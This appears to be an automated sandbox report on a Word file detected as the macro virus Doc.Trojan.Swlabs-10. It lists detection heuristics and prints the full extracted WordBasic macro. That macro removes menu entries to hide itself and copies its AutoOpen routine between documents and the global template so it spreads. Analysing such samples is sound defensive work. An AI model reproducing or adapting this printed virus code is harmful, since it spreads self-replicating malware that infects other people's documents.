MALICIOUS
188
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Swlabs-10. It contains legacy WordBasic macro markers and a VBA macro named AutoOpen. The AutoOpen macro attempts to hide the application, copy itself to the global template, and save the document as a template, indicating a propagation mechanism.
Heuristics 4
-
ClamAV: Doc.Trojan.Swlabs-10 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Swlabs-10
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "AutoOpen"
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1785 bytes |
SHA-256: c45b60d2ffd3a061450db0f21486b5aefe266f49f833b2a7a2ede6496e7c8616 |
|||
|
Detection
ClamAV:
Doc.Trojan.Swlabs-10
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
Dim FName$
Dim MacName$
Rem SkamWerks Labs Presents the Bitch Concept Created by NEVERMORE
Rem Run Payload, Copy Macros to Template.
On Error GoTo -1: On Error GoTo ErrorHandler
If WordBasic.[MenuItemText$]("&Tools", 0, 13, 0) = "&Macro..." Then
WordBasic.ToolsCustomizeMenus Name:="FileTemplates", Menu:="&File", Context:=0, Remove:=1
WordBasic.ToolsCustomizeMenus Name:="ToolsMacro", Menu:="&Tools", Context:=0, Remove:=1
WordBasic.ToolsCustomizeMenus Name:="FileTemplates", Menu:="&File", Context:=0, Remove:=1, MenuType:=1
WordBasic.ToolsCustomizeMenus Name:="ToolsMacro", Menu:="&File", Context:=0, Remove:=1, MenuType:=1
End If
Rem Virus Payload Area.
WordBasic.AppHide "Program Manager"
FName$ = WordBasic.[FileName$]()
MacName$ = FName$ + ":AutoOpen"
If WordBasic.[MacroFileName$]("AutoOpen") = "" Then GoTo EndCode
WordBasic.MacroCopy MacName$, "Global:AutoOpen", 1
ErrorHandler:
Rem Copy Macro(s) from Template to the Document
On Error GoTo -1: On Error GoTo AutoOpenHandler
MacName$ = FName$ + ":AutoOpen"
WordBasic.MacroCopy "Global:AutoOpen", MacName$, 1
AutoOpenHandler:
Rem Save Document as Template
If WordBasic.[FileName$]() <> "" Then
WordBasic.FileSaveAs Format:=1
End If
Rem Virii Unite!eate Virus
On Error GoTo -1: On Error GoTo 0:
On Error GoTo -1: On Error GoTo EndCode:
EndCode:
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.